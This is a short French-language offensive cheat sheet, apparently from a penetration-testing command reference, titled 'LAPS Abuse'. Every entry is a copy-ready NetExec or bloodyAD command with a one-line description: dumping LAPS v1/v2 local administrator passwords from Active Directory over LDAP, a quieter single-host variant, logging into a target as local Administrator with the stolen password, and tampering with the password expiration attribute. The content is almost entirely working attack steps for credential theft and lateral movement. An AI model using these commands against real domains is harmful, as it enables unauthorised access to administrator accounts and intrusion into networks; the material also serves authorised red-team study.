Exploitation

LAPS Abuse

Lire les mots de passe LAPS v1/v2 et les utiliser pour mouvement latéral.

Copy command
nxc ldap $DC -u $USER -p $PASS --laps

Description: Lire les mots de passe LAPS de tous les hôtes que notre compte peut lire via l'ACL.

Copy command
nxc ldap $DC -u $USER -p $PASS --laps --computer $COMPUTER

Description: LAPS ciblé sur une machine précise : moins bruyant qu'un dump complet.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr ms-Mcs-AdmPwd

Description: Lire l'attribut LAPS v1 directement si l'ACL le permet (ms-Mcs-AdmPwd).

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr msLAPS-EncryptedPassword

Description: LAPS v2 (Windows LAPS) : attribut chiffré, nécessite des droits spécifiques pour déchiffrer.

Copy command
nxc smb $TARGET -u Administrator -p '$LAPS_PASS' --local-auth

Description: Utiliser le mot de passe LAPS récupéré pour s'authentifier localement sur la machine.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$COMPUTER$' --attr ms-Mcs-AdmPwdExpirationTime --value 0

Description: Réinitialiser l'expiration LAPS à 0 : force un changement de mot de passe au prochain cycle.